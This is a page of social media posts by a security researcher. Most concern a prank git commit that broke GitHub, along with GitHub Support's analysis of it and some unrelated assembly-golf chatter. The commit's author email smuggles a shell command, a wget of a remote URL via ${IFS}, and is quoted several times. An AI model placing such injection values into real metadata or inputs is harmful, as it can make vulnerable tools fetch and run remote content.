Notices by Ryan Castellucci :nonbinary_flag: (ryanc@infosec.exchange), page 2

@geospacedman I don't think they have one, I think they just try to send. It's a verified email address, backticks notwithstanding.

@samir @q feel free to try and submit it yourself, just give me a shout in the greetz section :-)

@samir @q the replied no to my cheeky request for a bug bounty, and I have shared this gem of deviousness

@samir @q you mean the original repository?

Oh fuck, lol.

I identify as a problem, apparently GitHub's today.

They don't seem to appreciate the humor of an email address that is also a shell command injection attempt or the time zone of -2456.

@q

Formatting may get slightly mangled here, but should be decipherable:

GitHub Support, Jun 11, 2025, 8:17 AM UTC

Hi Ryan,

Thanks for your patience. So far, our engineering team found a commit with a malformed author/committer email and and invalid timestamps.

$ git cat-file commit d18cf25755d73e1ebc295155fe278c19f4f874fetree f828c7cd0f33131d46f8761fd875f64ce5af880dparent a69b1149073c467803f73a2efd55c10f07051e59author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456committer Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org> 1668615481 -2456

Author and committer email:

author Ryan Castellucci <wget${IFS}r.vc/ghe@ryanc.org>

That email uses shell expansion syntax: wget${IFS}r.vc/ghe. This is likely an attempt to exploit command substitution in log viewers or tools that unsafely handle commit metadata (e.g., CI scripts or webhooks).

Timestamps:

1668615481 -2456

The negative timezone offset -2456 is invalid. Standard timezones go from -1200 to +1400. This could cause issues in tools that parse or display timezones strictly.

Our engineering team are working on how to handle such scenarios to avoid the server errors you're seeing.

In the meantime, if this commit came from an external contributor or looks unintended, we recommend:

• Inspecting how it got into the repository

• Rewriting history to remove it (if it was part of a PR or forced push)

• Checking your workflow or scripts for unsafe parsing of Git metadata

Please give this a try and update me on how it goes.

Apparently I actually broke GitHub. They've slanderously blamed my "malformed commits". I've asked if my support ticket is eligible for a bug bounty.

@KingmaYpe the score to beat is 164 bytes :-)

@Neur0 we both work in computer security...

@0x10f Neat!

@jripley saving/restoring rbp and rbx actually saved bytes due to shorter opcode encodings. Those account for eight bytes, and then two bytes to clear the FPU stack, so ten bytes total.

@alina I'm going to eventually implement the whole SHA256 algorithm. 😄

So anyway, some people do crossword puzzles, I do assembly golf to cryptographic algorithms. This generates the 288 bytes of magic numbers for SHA2-256 in 164 bytes while still following the SysV AMD64 ABI.

https://gist.github.com/ryancdotorg/0d1baee4f3caf055c5931ce088e1c283#file-sha2_const-s

@KingmaYpe that seems very optimistic, what would that look like?

SHA2's "magic numbers" are uint32s: the fractional parts of the square roots of the first 8 primes and the fractional parts of the cube roots of the first 64 primes.

A precomputed table is 288 bytes.

How many bytes of x86_64 assembly would be needed to generate them?

Reply with your estimate.

@galvao I do need to actually release it as a crate.

@galvao cargo install --path . --all-features in the cloned repo directory should work, or you can drop the binary from github somewhere in your $PATH.

One of the times - oh yeah, somehow there was a transaction lock on the database from something else happening. So it wasn't anything I did.

The other time ... Well, let's just say the DBAs got a plate of cookies from me the next day.

@kos freq should generally be faster since it just shoves values into a hash table rather than having to sort them first - that's why I wrote it.